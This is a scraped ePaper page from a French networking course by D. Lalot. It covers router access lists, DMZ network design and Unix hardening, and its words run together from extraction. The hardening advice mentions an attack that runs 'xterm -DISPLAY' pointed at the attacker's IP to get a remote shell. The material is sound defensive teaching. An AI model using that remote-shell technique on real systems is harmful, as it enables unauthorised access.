11.07.2015 Views

Les Réseaux Informatiques - Kro gpg

Les Réseaux Informatiques - Kro gpg

Les Réseaux Informatiques - Kro gpg

SHOW MORE
SHOW LESS
  • No tags were found...

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

Ces commandes ont un sens d’application, on dit que l’access list s’applique en entrée ou sortie del’interface. Ceci permet surtout de contrôler totalement le réseau. En effet en Interne tout le monde peutbricoler un serveur mal configuré. Grâce à la politique des Firewall, ce serveur « non déclaré » ne pourraêtre visible.<strong>Les</strong> Topologies possibles de réseau• Bien protéger son réseau par une zone démilitarisée.On ne laisse que 2 ou 3 serveurs en accès extérieurs, le reste du réseau étant dans une zone nonaccessible. Dans cette zone, on y met le serveur de mail, le serveur de nom, le serveur WEB, ainsi que leserveur Proxy WEB/FTP. Dans cette solution, personne ne peut en interne mettre un donnée surl’INTERNET, accessible sur son poste . Il devra demander à l’Administrateur de la machine extérieureLa zone interne, peut avoir une classe de numéro IP non accessible de l’extérieur (ex 10.0.0.0) ou(192.168.0.0) ou 172.16.0.0On peut même pousser le vice à supprimer la passerelle dans la configuration d’un poste et ne plusmettre qu’une route manuelle. 55INTERNET et piratesZone PubliqueUne partie declasse CRouteur à deuxcartesETHERNETFirewallZone DémilitariséeDMZ. Un réseau nonroutable. Le réseau Internede l’entrepriseLe serveur WebLe DNSLe SMTP/POPLe ProxyDans ce cas de figure, une machine du réseau DMZ ne pourra faire un ping sur l’INTERNET. Elle passerapar les serveurs PROXY du réseau Public, pour faire des requêtes WEB .De quels services faut il se méfier sous Unix.1. Enlever tout ce qui sert à rien, surtout les démons lancés par root. Même le démon talk a eu des bugsde sécurité.2. Eviter les rcommandes (rlogin , rsh..) basées sur la confiance en une adresse IP ou pire en un nomFQDN. Regarder les fichiers .rhosts et les enlever.3. Enlever le shell aux utilisateurs (remplacer /bin/bash par /bin/true) dans /etc/passwd4. Avoir un mot de passe de root long > 8 caractères et alpha numérique5. Xwindow. Ne pas faire de commandes au hasard (xhost + par exemple). Filtrer les accés Xwindow surle firewall (Port 6000). En effet souvent une bug de sécurité permet de lancer la commande xterm –DISPLAY=adresse IP du pirate. Et un joli shell apparaît sur le terminal X du pirate.55 On peut le faire avec la commande route. On le met par exemple dans autoexec.bat<strong>Les</strong> <strong>Réseaux</strong> <strong>Informatiques</strong> D. Lalot 91

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!